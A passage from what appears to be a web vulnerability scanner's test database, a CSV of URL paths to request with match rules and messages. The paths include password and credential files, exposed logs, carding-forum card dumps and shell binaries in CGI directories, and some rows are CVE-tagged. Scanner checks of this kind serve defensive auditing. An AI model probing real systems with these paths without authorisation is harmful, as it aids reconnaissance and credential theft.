"001724","","1","/log.htm","GET","200","","","","","This might be interesting.","","" "001725","","1","/log.html","GET","200","","","","","This might be interesting.","","" "001726","","1","/log.txt","GET","200","","","","","This might be interesting.","","" "001727","","1","/logfile","GET","200","","","","","This might be interesting.","","" "001728","","1","/logfile.htm","GET","200","","","","","This might be interesting.","","" "001729","","1","/logfile.html","GET","200","","","","","This might be interesting.","","" "001730","","1","/logfile.txt","GET","200","","","","","This might be interesting.","","" "001731","","1","/logfile/","GET","200","","","","","This might be interesting.","","" "001732","","1","/logfiles/","GET","200","","","","","This might be interesting.","","" "001733","","1","/logger.html","GET","200","","","","","This might be interesting.","","" "001734","","1","/logger/","GET","200","","","","","This might be interesting.","","" "001735","","1","/logging/","GET","200","","","","","This might be interesting.","","" "001736","","1","/login/","GET","200","","","","","This might be interesting.","","" "001737","","1","/logs.txt","GET","200","","","","","This might be interesting.","","" "001738","","1","/logs/","GET","200","","","","","This might be interesting.","","" "001739","","1","/logs/access_log","GET","200","","","","","This might be interesting.","","" "001740","","1","/logs/error_log","GET","200","","","","","This might be interesting.","","" "001741","","1","/lost+found/","GET","200","","","","","This might be interesting.","","" "001742","","1","/mail/","GET","200","","","","","This might be interesting.","","" "001743","","1","/manage/cgi/cgiproc","GET","200","","","","","This might be interesting.","","" "001744","","1","/marketing/","GET","200","","","","","This might be interesting.","","" "001745","","1","/master.password","GET","200","","","","","This might be interesting.","","" "001746","","1","/mbox","GET","200","","","","","This might be interesting.","","" "001747","","1","/members/","GET","200","","","","","This might be interesting.","","" "001748","","1","/message/","GET","200","","","","","This might be interesting.","","" "001749","","1","/messaging/","GET","200","","","","","This might be interesting.","","" "001750","","1","/ministats/admin.cgi","GET","200","","","","","This might be interesting.","","" "001751","","1","/misc/","GET","200","","","","","This might be interesting.","","" "001752","","1","/mkstats/","GET","200","","","","","This might be interesting.","","" "001753","","1","/movimientos/","GET","200","","","","","This might be interesting.","","" "001754","","1","/mp3/","GET","200","","","","","This might be interesting.","","" "001755","","1","/mqseries/","GET","200","","","","","This might be interesting.","","" "001756","","1","/msql/","GET","200","","","","","This might be interesting.","","" "001757","","1","/msword/","GET","200","","","","","This might be interesting.","","" "001758","","1","/Msword/","GET","200","","","","","This might be interesting.","","" "001759","","1","/MSword/","GET","200","","","","","This might be interesting.","","" "001760","","1","/NetDynamic/","GET","200","","","","","This might be interesting.","","" "001761","","1","/NetDynamics/","GET","200","","","","","This might be interesting.","","" "001762","","1","/netscape/","GET","200","","","","","This might be interesting.","","" "001763","","1","/new","GET","200","","","","","This might be interesting.","","" "001764","","1","/new/","GET","200","","","","","This might be interesting.","","" "001765","","1","/news","GET","200","","","","","This might be interesting.","","" "001767","","1","/noticias/","GET","200","","","","","This might be interesting.","","" "001768","","1","/odbc/","GET","200","","","","","This might be interesting.","","" "001769","","1","/officescan/cgi/jdkRqNotify.exe","GET","200","","","","","This might be interesting.","","" "001770","","1","/old/","GET","200","","","","","This might be interesting.","","" "001771","","1","/oracle","GET","200","","","","","This might be interesting.","","" "001772","","1","/oradata/","GET","200","","","","","This might be interesting.","","" "001773","","1","/order/","GET","200","","","","","This might be interesting.","","" "001774","","1","/orders/","GET","200","","","","","This might be interesting.","","" "001775","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/orders/checks.txt","GET","200","","","","","Seen in carding forums.","","" "001776","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/orders/mountain.cfg","GET","200","","","","","Seen in carding forums.","","" "001777","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/orders/orders.log","GET","200","","","","","Seen in carding forums.","","" "001778","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/orders/orders.txt","GET","200","","","","","Seen in carding forums.","","" "001779","","1","/outgoing/","GET","200","","","","","This might be interesting.","","" "001780","","1","/ows/","GET","200","","","","","This might be interesting: Oracle Web Services?","","" "001781","","1","/pages/","GET","200","","","","","This might be interesting.","","" "001782","","1","/Pages/","GET","200","","","","","This might be interesting.","","" "001783","","1","/passwd","GET","200","","","","","This might be interesting.","","" "001784","","1","/passwd.adjunct","GET","200","","","","","This might be interesting.","","" "001785","","1","/passwd.txt","GET","200","","","","","This might be interesting.","","" "001786","","1","/passwdfile","GET","200","","","","","This might be interesting.","","" "001787","","1","/password","GET","200","","","","","This might be interesting.","","" "001788","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/password/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001789","","1","/passwords.txt","GET","200","","","","","This might be interesting.","","" "001790","","1","/passwords/","GET","200","","","","","This might be interesting.","","" "001791","","1","/PDG_Cart/","GET","200","","","","","This might be interesting.","","" "001792","","1","/people.list","GET","200","","","","","This might be interesting.","","" "001793","","1","/perl5/","GET","200","","","","","This might be interesting.","","" "001794","","1","/php/","GET","200","","","","","This might be interesting.","","" "001795","","b","@PHPMYADMINchangelog.php","GET","phpMyAdmin\s\-\sChangeLog","","","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "001796","","b","@PHPMYADMINChangeLog","GET","phpMyAdmin\s-\sChangeLog","","","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "001797","","1","/pics/","GET","200","","","","","This might be interesting.","","" "001798","","1","/piranha/secure/passwd.php3","GET","200","","","","","This might be interesting.","","" "001799","","1","/pix/","GET","200","","","","","This might be interesting.","","" "001800","","1","/poll","GET","200","","","","","This might be interesting.","","" "001801","","1","/polls","GET","200","","","","","This might be interesting.","","" "001802","","1","/porn/","GET","200","","","","","This might be interesting.","","" "001803","","1","/pr0n/","GET","200","","","","","This might be interesting.","","" "001804","","1","/privado/","GET","200","","","","","This might be interesting.","","" "001805","","1","/private/","GET","200","","","","","This might be interesting.","","" "001806","","1","/prod/","GET","200","","","","","This might be interesting.","","" "001807","","1","/pron/","GET","200","","","","","This might be interesting.","","" "001808","","1","/prueba/","GET","200","","","","","This might be interesting.","","" "001809","","1","/pruebas/","GET","200","","","","","This might be interesting.","","" "001810","","1","/pub/","GET","200","","","","","This might be interesting.","","" "001811","","1","/public/","GET","200","","","","","This might be interesting.","","" "001812","","1","/publica/","GET","200","","","","","This might be interesting.","","" "001813","","1","/publicar/","GET","200","","","","","This might be interesting.","","" "001814","","1","/publico/","GET","200","","","","","This might be interesting.","","" "001815","","1","/purchase/","GET","200","","","","","This might be interesting.","","" "001816","","1","/purchases/","GET","200","","","","","This might be interesting.","","" "001818","","1","/pwd.db","GET","200","","","","","This might be interesting.","","" "001819","","1","/python/","GET","200","","","","","This might be interesting.","","" "001820","","1","/readme","GET","200","","","","","This might be interesting.","","" "001821","","1","/README.TXT","GET","200","","","","","This might be interesting.","","" "001822","","1","/readme.txt","GET","200","","","","","This might be interesting.","","" "001823","","1","/register/","GET","200","","","","","This might be interesting.","","" "001824","","1","/registered/","GET","200","","","","","This might be interesting.","","" "001825","","1","/reports/","GET","200","","","","","This might be interesting.","","" "001826","","1","/reseller/","GET","200","","","","","This might be interesting.","","" "001827","","1","/restricted/","GET","200","","","","","This might be interesting.","","" "001828","","1","/retail/","GET","200","","","","","This might be interesting.","","" "001829","","1","/reviews/newpro.cgi","GET","200","","","","","This might be interesting.","","" "001830","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/root/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001831","","1","/sales/","GET","200","","","","","This might be interesting.","","" "001832","","1","/sample/","GET","200","","","","","This might be interesting.","","" "001833","","1","/samples/","GET","200","","","","","This might be interesting.","","" "001834","","1","/save/","GET","200","","","","","This might be interesting.","","" "001835","","1","/scr/","GET","200","","","","","This might be interesting.","","" "001836","","1","/scratch","GET","200","","","","","This might be interesting.","","" "001837","","1","/scripts/weblog","GET","200","","","","","This might be interesting.","","" "001838","","1","/search.vts","GET","200","","","","","This might be interesting.","","" "001839","","1","/search97.vts","GET","200","","","","","This might be interesting.","","" "001840","","1","/secret/","GET","200","","","","","This might be interesting.","","" "001841","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/secure/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001842","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/secured/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001843","","1","/sell/","GET","200","","","","","This might be interesting.","","" "001844","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/server_stats/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001845","","1","/service/","GET","200","","","","","This might be interesting.","","" "001846","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/services/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001847","","1","/servicio/","GET","200","","","","","This might be interesting.","","" "001848","","1","/servicios/","GET","200","","","","","This might be interesting.","","" "001849","","1","/setup/","GET","200","","","","","This might be interesting.","","" "001850","","1","/shop/","GET","200","","","","","This might be interesting.","","" "001851","","1","/shopper/","GET","200","","","","","This might be interesting.","","" "001852","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/software/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001853","","1","/solaris/","GET","200","","","","","This might be interesting.","","" "001854","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/source/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001855","","1","/Sources/","GET","200","","","","","This might be interesting: may be YaBB.","","" "001856","","1","/spwd","GET","200","","","","","This might be interesting.","","" "001857","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/sql/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001858","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/src/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001859","","1","/srchadm","GET","200","","","","","This might be interesting.","","" "001860","","1","/ss.cfg","GET","200","","","","","This might be interesting.","","" "001861","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/ssi/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001862","","1","/staff/","GET","200","","","","","This might be interesting.","","" "001863","","1","/stat.htm","GET","200","","","","","This might be interesting.","","" "001864","","1","/stat/","GET","200","","","","","This might be interesting.","","" "001865","","1","/statistic/","GET","200","","","","","This might be interesting.","","" "001866","","1","/Statistics/","GET","200","","","","","This might be interesting.","","" "001867","","1","/statistics/","GET","200","","","","","This might be interesting.","","" "001868","","1","/stats.htm","GET","200","","","","","This might be interesting.","","" "001869","","1","/stats.html","GET","200","","","","","This might be interesting.","","" "001870","","1","/stats.txt","GET","200","","","","","This might be interesting.","","" "001871","","1","/stats/","GET","200","","","","","This might be interesting.","","" "001872","","1","/Stats/","GET","200","","","","","This might be interesting.","","" "001873","","1","/status/","GET","200","","","","","This might be interesting.","","" "001874","","1","/store/","GET","200","","","","","This might be interesting.","","" "001875","","1","/StoreDB/","GET","200","","","","","This might be interesting.","","" "001876","","1","/stylesheet/","GET","200","","","","","This might be interesting.","","" "001877","","1","/stylesheets/","GET","200","","","","","This might be interesting.","","" "001878","","1","/subir/","GET","200","","","","","This might be interesting.","","" "001879","","1","/sun/","GET","200","","","","","This might be interesting.","","" "001880","","1","/super_stats/access_logs","GET","200","","","","","Web logs are exposed..","","" "001881","","1","/super_stats/error_logs","GET","200","","","","","Web logs are exposed.","","" "001882","","1","/support/","GET","200","","","","","This might be interesting.","","" "001883","","1","/swf","GET","200","","","","","This might be interesting: Flash files?","","" "001884","","1","/sys/","GET","200","","","","","This might be interesting.","","" "001885","","1","/system/","GET","200","","","","","This might be interesting.","","" "001886","","1","/tar/","GET","200","","","","","This might be interesting.","","" "001887","","1","/tarjetas/","GET","200","","","","","This might be interesting.","","" "001888","","1","/temp/","GET","200","","","","","This might be interesting.","","" "001889","","1","/template/","GET","200","","","","","This might be interesting: could have sensitive files or system information.","","" "001890","","1","/temporal/","GET","200","","","","","This might be interesting.","","" "001891","","1","/test.htm","GET","200","","","","","This might be interesting.","","" "001892","","1","/test.html","GET","200","","","","","This might be interesting.","","" "001893","","1","/test.txt","GET","200","","","","","This might be interesting.","","" "001894","","1","/test/","GET","200","","","","","This might be interesting.","","" "001895","","1","/testing/","GET","200","","","","","This might be interesting.","","" "001896","","1","/tests/","GET","200","","","","","This might be interesting.","","" "001897","","1","/tmp/","GET","200","","","","","This might be interesting.","","" "001898","","1","/tools/","GET","200","","","","","This might be interesting.","","" "001899","","1","/tpv/","GET","200","","","","","This might be interesting.","","" "001900","","1","/trabajo/","GET","200","","","","","This might be interesting.","","" "001901","","1","/trafficlog/","GET","200","","","","","This might be interesting.","","" "001902","","1","/transito/","GET","200","","","","","This might be interesting.","","" "001903","","1","/tree/","GET","200","","","","","This might be interesting.","","" "001904","","1","/trees/","GET","200","","","","","This might be interesting.","","" "001905","","1","/updates/","GET","200","","","","","This might be interesting.","","" "001906","","1","/user/","GET","200","","","","","This might be interesting.","","" "001907","","1","/users/","GET","200","","","","","This might be interesting.","","" "001908","","1","/users/scripts/submit.cgi","GET","200","","","","","This might be interesting.","","" "001909","","1","/ustats/","GET","200","","","","","This might be interesting.","","" "001910","","1","/usuario/","GET","200","","","","","This might be interesting.","","" "001911","","1","/usuarios/","GET","200","","","","","This might be interesting.","","" "001912","","1","/vfs/","GET","200","","","","","This might be interesting.","","" "001913","","1","/w3perl/admin","GET","200","","","","","This might be interesting.","","" "001914","","1","/warez/","GET","200","","","","","This might be interesting.","","" "001915","","1","/web/","GET","200","","","","","This might be interesting.","","" "001916","","1","/web800fo/","GET","200","","","","","This might be interesting.","","" "001917","","1","/webaccess.htm","GET","200","","","","","This might be interesting.","","" "001918","","1","/webaccess/access-options.txt","GET","200","","","","","This might be interesting.","","" "001919","","1","/webadmin/","GET","200","","","","","This might be interesting: probably HostingController, www.hostingcontroller.com","","" "001920","","1","/webboard/","GET","200","","","","","This might be interesting.","","" "001921","","1","/webcart-lite/","GET","200","","","","","This might be interesting.","","" "001922","","1","/webcart/","GET","200","","","","","This might be interesting.","","" "001923","","1","/webdata/","GET","200","","","","","This might be interesting.","","" "001924","","1","/weblog/","GET","200","","","","","This might be interesting.","","" "001925","","1","/weblogs/","GET","200","","","","","This might be interesting.","","" "001926","","1","/webmaster_logs/","GET","200","","","","","This might be interesting.","","" "001927","","1","/WebShop/","GET","200","","","","","This might be interesting.","","" "001928","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/WebShop/logs/cc.txt","GET","200","","","","","Seen in carding forums.","","" "001929","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/WebShop/templates/cc.txt","GET","200","","","","","Seen in carding forums.","","" "001930","","1","/website/","GET","200","","","","","This might be interesting.","","" "001931","","1","/webstats/","GET","200","","","","","This might be interesting.","","" "001932","","1","/WebTrend/","GET","200","","","","","This might be interesting.","","" "001933","","1","/Web_store/","GET","200","","","","","This might be interesting.","","" "001934","","1","/windows/","GET","200","","","","","This might be interesting.","","" "001935","","1","/word/","GET","200","","","","","This might be interesting.","","" "001936","","1","/work/","GET","200","","","","","This might be interesting.","","" "001937","","1","/wstats/","GET","200","","","","","This might be interesting.","","" "001938","","1","/wusage/","GET","200","","","","","This might be interesting.","","" "001939","","1","/www-sql/","GET","200","","","","","This might be interesting.","","" "001940","","1","/www/","GET","200","","","","","This might be interesting.","","" "001941","","1","/wwwboard/wwwboard.cgi","GET","200","","","","","This might be interesting.","","" "001942","","1","/wwwboard/wwwboard.pl","GET","200","","","","","This might be interesting.","","" "001943","","1","/wwwjoin/","GET","200","","","","","This might be interesting.","","" "001944","","1","/wwwlog/","GET","200","","","","","This might be interesting.","","" "001945","","1","/wwwstats.html","GET","200","","","","","This might be interesting.","","" "001946","","1","/wwwstats/","GET","200","","","","","This might be interesting.","","" "001947","","1","/wwwthreads/3tvars.pm","GET","200","","","","","This might be interesting.","","" "001948","","1","/wwwthreads/w3tvars.pm","GET","200","","","","","This might be interesting.","","" "001949","","1","/zipfiles/","GET","200","","","","","This might be interesting.","","" "001950","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/_pages","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "001952","","1","@CGIDIRS.fhp","GET","200","","","","","This might be interesting.","","" "001953","","1","@CGIDIRSadd_ftp.cgi","GET","200","","","","","This might be interesting.","","" "001954","","1","@CGIDIRSadmin.cgi","GET","200","","","","","This might be interesting.","","" "001955","","1","@CGIDIRSadmin.php","GET","200","","","","","This might be interesting.","","" "001956","","1","@CGIDIRSadmin.php3","GET","200","","","","","This might be interesting.","","" "001957","","1","@CGIDIRSadmin.pl","GET","200","","","","","This might be interesting.","","" "001958","","1","@CGIDIRSadminhot.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001959","","1","@CGIDIRSadminwww.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "001960","","1","@CGIDIRSAnyBoard.cgi","GET","200","","","","","This might be interesting.","","" "001961","","1","@CGIDIRSAnyForm","GET","200","","","","","This might be interesting.","","" "001962","","1","@CGIDIRSAnyForm2","GET","200","","","","","This might be interesting.","","" "001963","","1","@CGIDIRSash","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "001964","","1","@CGIDIRSax-admin.cgi","GET","200","","","","","This might be interesting.","","" "001965","","1","@CGIDIRSax.cgi","GET","200","","","","","This might be interesting.","","" "001966","","1","@CGIDIRSaxs.cgi","GET","200","","","","","This might be interesting.","","" "001967","","1","@CGIDIRSbash","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "001968","","1","@CGIDIRSbnbform","GET","200","","","","","This might be interesting.","","" "001969","","1","@CGIDIRSbnbform.cgi","GET","200","","","","","This might be interesting.","","" "001970","","1","@CGIDIRScart.pl","GET","200","","","","","This might be interesting.","","" "001971","","1","@CGIDIRScgimail.exe","GET","200","","","","","This might be interesting.","","" "001972","","1","@CGIDIRSclassifieds","GET","200","","","","","This might be interesting.","","" "001973","","1","@CGIDIRSclassifieds.cgi","GET","200","","","","","This might be interesting.","","" "001974","","1","@CGIDIRSclickcount.pl?view=test","GET","200","","","","","This might be interesting.","","" "001975","","1","@CGIDIRScode.php","GET","200","","","","","This might be interesting.","","" "001976","","1","@CGIDIRScode.php3","GET","200","","","","","This might be interesting.","","" "001977","","1","@CGIDIRScount.cgi","GET","200","","","","","This might be interesting.","","" "001978","","1","@CGIDIRScsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "001979","","1","@CGIDIRScstat.pl","GET","200","","","","","This might be interesting.","","" "001980","","1","@CGIDIRSc_download.cgi","GET","200","","","","","This might be interesting.","","" "001981","","1","@CGIDIRSdasp/fm_shell.asp","GET","200","","","","","This might be interesting.","","" "001982","","1","@CGIDIRSday5datacopier.cgi","GET","200","","","","","This might be interesting.","","" "001983","","1","@CGIDIRSdfire.cgi","GET","200","","","","","This might be interesting.","","" "001984","","1","@CGIDIRSdig.cgi","GET","200","","","","","This might be interesting.","","" "001985","","1","@CGIDIRSdisplayTC.pl","GET","200","","","","","This might be interesting.","","" "001986","","1","@CGIDIRSedit.pl","GET","200","","","","","This might be interesting.","","" "001987","","1","@CGIDIRSenter.cgi","GET","200","","","","","This might be interesting.","","" "001988","","1","@CGIDIRSenviron.cgi","GET","200","","","","","This might be interesting.","","" "001989","","1","@CGIDIRSenviron.pl","GET","200","","","","","This might be interesting.","","" "001990","","1","@CGIDIRSex-logger.pl","GET","200","","","","","This might be interesting.","","" "001991","","1","@CGIDIRSexcite","GET","200","","","","","This might be interesting.","","" "001992","","1","@CGIDIRSfilemail","GET","200","","","","","This might be interesting.","","" "001993","","1","@CGIDIRSfilemail.pl","GET","200","","","","","This might be interesting.","","" "001994","","1","@CGIDIRSftp.pl","GET","200","","","","","This might be interesting: is file transfer allowed?","","" "001995","","1","@CGIDIRSftpsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "001996","","1","@CGIDIRSgetdoc.cgi","GET","200","","","","","This might be interesting.","","" "001997","","1","@CGIDIRSglimpse","GET","200","","","","","This might be interesting.","","" "001998","","1","@CGIDIRShitview.cgi","GET","200","","","","","This might be interesting.","","" "001999","","1","@CGIDIRSjailshell","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002000","CVE-1999-0260","1","@CGIDIRSjj","GET","200","","","","","Allows attackers to execute commands as http daemon","","" "002001","","1","@CGIDIRSksh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002002","","1","@CGIDIRSlog-reader.cgi","GET","200","","","","","This might be interesting.","","" "002003","","1","@CGIDIRSlog/","GET","200","","","","","This might be interesting.","","" "002004","","1","@CGIDIRSlogin.cgi","GET","200","","","","","This might be interesting.","","" "002005","","1","@CGIDIRSlogin.pl","GET","200","","","","","This might be interesting.","","" "002006","","1","@CGIDIRSlogit.cgi","GET","200","","","","","This might be interesting.","","" "002007","","1","@CGIDIRSlogs.pl","GET","200","","","","","This might be interesting.","","" "002008","","1","@CGIDIRSlogs/","GET","200","","","","","This might be interesting.","","" "002009","","1","@CGIDIRSlogs/access_log","GET","200","","","","","This might be interesting.","","" "002010","","1","@CGIDIRSlogs/error_log","GET","200","","","","","This might be interesting.","","" "002011","","1","@CGIDIRSlookwho.cgi","GET","200","","","","","This might be interesting.","","" "002012","","1","@CGIDIRSmaillist.cgi","GET","200","","","","","This might be interesting.","","" "002013","","1","@CGIDIRSmaillist.pl","GET","200","","","","","This might be interesting.","","" "002014","","1","@CGIDIRSman.sh","GET","200","","","","","This might be interesting.","","" "002015","","1","@CGIDIRSmeta.pl","GET","200","","","","","This might be interesting.","","" "002016","","1","@CGIDIRSminimal.exe","GET","200","","","","","This might be interesting.","","" "002017","","1","@CGIDIRSnlog-smb.cgi","GET","200","","","","","This might be interesting.","","" "002018","","1","@CGIDIRSnlog-smb.pl","GET","200","","","","","This might be interesting.","","" "002019","","1","@CGIDIRSnoshell","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002020","","1","@CGIDIRSnph-publish","GET","200","","","","","This might be interesting.","","" "002021","","1","@CGIDIRSntitar.pl","GET","200","","","","","This might be interesting.","","" "002022","","1","@CGIDIRSpass","GET","200","","","","","This might be interesting.","","" "002023","","1","@CGIDIRSpasswd","GET","200","","","","","This might be interesting.","","" "002024","","1","@CGIDIRSpasswd.txt","GET","200","","","","","This might be interesting.","","" "002025","","1","@CGIDIRSpassword","GET","200","","","","","This might be interesting.","","" "002026","","1","@CGIDIRSpost_query","GET","200","","","","","This might be interesting.","","" "002027","","1","@CGIDIRSpu3.pl","GET","200","","","","","This might be interesting.","","" "002028","","1","@CGIDIRSratlog.cgi","GET","200","","","","","This might be interesting.","","" "002029","","1","@CGIDIRSresponder.cgi","GET","200","","","","","This might be interesting.","","" "002030","","1","@CGIDIRSrguest.exe","GET","200","","","","","This might be interesting.","","" "002031","","1","@CGIDIRSrksh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002032","","1","@CGIDIRSrsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002033","","1","@CGIDIRSsearch.cgi","GET","200","","","","","This might be interesting.","","" "002034","","1","@CGIDIRSsearch.pl","GET","200","","","","","This might be interesting.","","" "002035","","1","@CGIDIRSsession/adminlogin","GET","200","","","","","This might be interesting.","","" "002036","","1","@CGIDIRSsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002037","","1","@CGIDIRSshow.pl","GET","200","","","","","This might be interesting.","","" "002038","","1","@CGIDIRSstat/","GET","200","","","","","This might be interesting.","","" "002039","","1","@CGIDIRSstats-bin-p/reports/index.html","GET","200","","","","","This might be interesting.","","" "002040","","1","@CGIDIRSstats.pl","GET","200","","","","","This might be interesting.","","" "002041","","1","@CGIDIRSstats.prf","GET","200","","","","","This might be interesting.","","" "002042","","1","@CGIDIRSstats/","GET","200","","","","","This might be interesting.","","" "002043","","1","@CGIDIRSstatsconfig","GET","200","","","","","This might be interesting.","","" "002044","","1","@CGIDIRSstats_old/","GET","200","","","","","This might be interesting.","","" "002045","","1","@CGIDIRSstatview.pl","GET","200","","","","","This might be interesting.","","" "002046","","1","@CGIDIRSsurvey","GET","200","","","","","This might be interesting.","","" "002047","","1","@CGIDIRSsurvey.cgi","GET","200","","","","","This might be interesting.","","" "002048","","1","@CGIDIRStablebuild.pl","GET","200","","","","","This might be interesting.","","" "002049","","1","@CGIDIRStcsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002050","","1","@CGIDIRStest.cgi","GET","200","","","","","This might be interesting.","","" "002051","","1","@CGIDIRStest/test.cgi","GET","200","","","","","This might be interesting.","","" "002052","","1","@CGIDIRStextcounter.pl","GET","200","","","","","This might be interesting.","","" "002053","","1","@CGIDIRStidfinder.cgi","GET","200","","","","","This might be interesting.","","" "002054","","1","@CGIDIRStigvote.cgi","GET","200","","","","","This might be interesting.","","" "002055","","1","@CGIDIRStpgnrock","GET","200","","","","","This might be interesting.","","" "002056","","1","@CGIDIRSultraboard.cgi","GET","200","","","","","This might be interesting.","","" "002057","","1","@CGIDIRSultraboard.pl","GET","200","","","","","This might be interesting.","","" "002058","","1","@CGIDIRSviewlogs.pl","GET","200","","","","","This might be interesting.","","" "002059","","1","@CGIDIRSvisitor.exe","GET","200","","","","","This might be interesting.","","" "002060","","1","@CGIDIRSw3-msql","GET","200","","","","","This might be interesting.","","" "002061","","1","@CGIDIRSw3-sql","GET","200","","","","","This might be interesting.","","" "002062","","1","@CGIDIRSwebais","GET","200","","","","","This might be interesting.","","" "002063","","1","@CGIDIRSwebbbs.cgi","GET","200","","","","","This might be interesting.","","" "002064","","1","@CGIDIRSwebbbs.exe","GET","200","","","","","This might be interesting.","","" "002065","","1","@CGIDIRSwebutil.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002066","","1","@CGIDIRSwebutils.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002067","","1","@CGIDIRSwebwho.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002068","","1","@CGIDIRSwguest.exe","GET","200","","","","","This might be interesting.","","" "002069","","1","@CGIDIRSwww-sql","GET","200","","","","","This might be interesting.","","" "002070","","1","@CGIDIRSwwwboard.cgi.cgi","GET","200","","","","","This might be interesting.","","" "002071","","1","@CGIDIRSwwwboard.pl","GET","200","","","","","This might be interesting.","","" "002072","","1","@CGIDIRSwwwstats.pl","GET","200","","","","","This might be interesting.","","" "002073","","1","@CGIDIRSwwwthreads/3tvars.pm","GET","200","","","","","This might be interesting.","","" "002074","","1","@CGIDIRSwwwthreads/w3tvars.pm","GET","200","","","","","This might be interesting.","","" "002075","","1","@CGIDIRSzsh","GET","200","","","","","This might be interesting: possibly a system shell found.","","" "002076","CVE-1999-1520","12","/adsamples/config/site.csc","GET","200","","","","","Contains SQL username/password","","" "002077","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/advworks/equipment/catalog_type.asp","GET","200","","","","","Seen in carding forums.","","" "002078","","1","/carbo.dll","GET","200","","","","","This might be interesting.","","" "002079","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","1","/clocktower/","GET","200","","","","","Microsoft Site Server sample files may have SQL injection.","","" "002080","","1","/localstart.asp","GET","You are not authorized","","","","","This might be interesting.","","" "002081","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","1","/market/","GET","200","","","","","Microsoft Site Server sample files may have SQL injection.","","" "002082","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","1","/mspress30/","GET","200","","","","","Microsoft Site Server sample files may have SQL injection.","","" "002083","","1","/sam","GET","200","","","","","This might be interesting.","","" "002084","","1","/sam.bin","GET","200","","","","","This might be interesting.","","" "002085","","1","/sam._","GET","200","","","Forbidden","","This might be interesting.","","" "002086","","1","/samples/search/queryhit.htm","GET","200","","","","","This might be interesting.","","" "002087","","1","/scripts/counter.exe","GET","200","","","","","This might be interesting.","","" "002088","CVE-2002-1769","76","/scripts/cphost.dll","GET","200","","","","","cphost.dll may have a DoS and a traversal issue.","","" "002089","","1","/scripts/fpadmcgi.exe","GET","200","","","","","This might be interesting.","","" "002090","","1","/scripts/postinfo.asp","GET","200","","","","","This might be interesting.","","" "002091","","1","/scripts/samples/ctguestb.idc","GET","200","","","","","This might be interesting.","","" "002092","","1","/scripts/samples/search/webhits.exe","GET","200","","","","","This might be interesting.","","" "002093","","1","/site/iissamples/","GET","200","","","","","This might be interesting.","","" "002094","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","1","/vc30/","GET","200","","","","","Microsoft Site Server sample files may have SQL injection.","","" "002095","","1","/_mem_bin/","GET","200","","","","","This might be interesting: user login","","" "002096","","1","/_mem_bin/FormsLogin.asp","GET","200","","","","","This might be interesting: user login","","" "002097","","1","/perl/files.pl","GET","200","","","","","This might be interesting.","","" "002098","","1","/perl5/files.pl","GET","200","","","","","This might be interesting.","","" "002099","","1","/scripts/convert.bas","GET","200","","","","","This might be interesting.","","" "002100","","1","/owa_util%2esignature","GET","200","","","","","This 